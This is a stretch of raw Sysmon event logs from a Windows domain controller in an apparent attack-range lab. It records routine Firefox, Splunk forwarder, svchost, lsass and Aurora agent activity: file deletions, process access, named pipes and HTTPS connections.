23542300x800000000000000048025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.320{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=075B1530F2D169AE6A45E04212A38E0B,SHA256=9A225791CECE19660C913BCC7B7D605E7E64A145850936549AC672FBEF2DD5BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.320{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6B5707313A6F6FA7C5C26E4B284B919,SHA256=C0A954AA8878D8D7BA73D4D0ECA1D3DCE2600B851454F280D24FD15F066E5CDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.289{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.289{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.165{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.165{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.134{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-0C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:37.134{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-0C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.118{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.118{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.118{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.102{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.102{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000048012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:34.609{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56485-false10.0.1.12-8000- 10341000x800000000000000048011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.025{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.009{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.15671930997117164289C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:37.009{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.15671930997117164289C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.009{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.009{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.2.182850921C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.009{FE4C2B44-E66B-63C7-9B06-00000000AF02}33046440C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.009{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.998{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+f68f92|C:\Program Files\Mozilla Firefox\xul.dll+b7bf9e|C:\Program Files\Mozilla Firefox\xul.dll+24922f|C:\Program Files\Mozilla Firefox\xul.dll+248fba|C:\Program Files\Mozilla Firefox\xul.dll+f858cd|C:\Program Files\Mozilla Firefox\xul.dll+1095b87|C:\Program Files\Mozilla Firefox\xul.dll+e63e24|C:\Program Files\Mozilla Firefox\xul.dll+c2d528|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+236871|C:\Program Files\Mozilla Firefox\xul.dll+ce82ce|C:\Program Files\Mozilla Firefox\xul.dll+1870580|C:\Program Files\Mozilla Firefox\xul.dll+1822181|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf|C:\Program Files\Mozilla Firefox\xul.dll+1e7190e|C:\Program Files\Mozilla Firefox\xul.dll+1822568 23542300x800000000000000018895Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:38.822{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2751FA361AC61CB8EB32D995AB168E0,SHA256=E9B9A3CFA74065A5B89220FE4D757C9412608011997587A5365A25EEF2726654,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.961{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.942{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.942{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.942{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.941{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.941{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.941{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-9F06-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.940{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.940{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.940{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.938{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.938{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.938{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 354300x800000000000000048419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.188{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56500-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000048418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.112{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56499-false35.244.181.201201.181.244.35.bc.googleusercontent.com443https 354300x800000000000000048417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 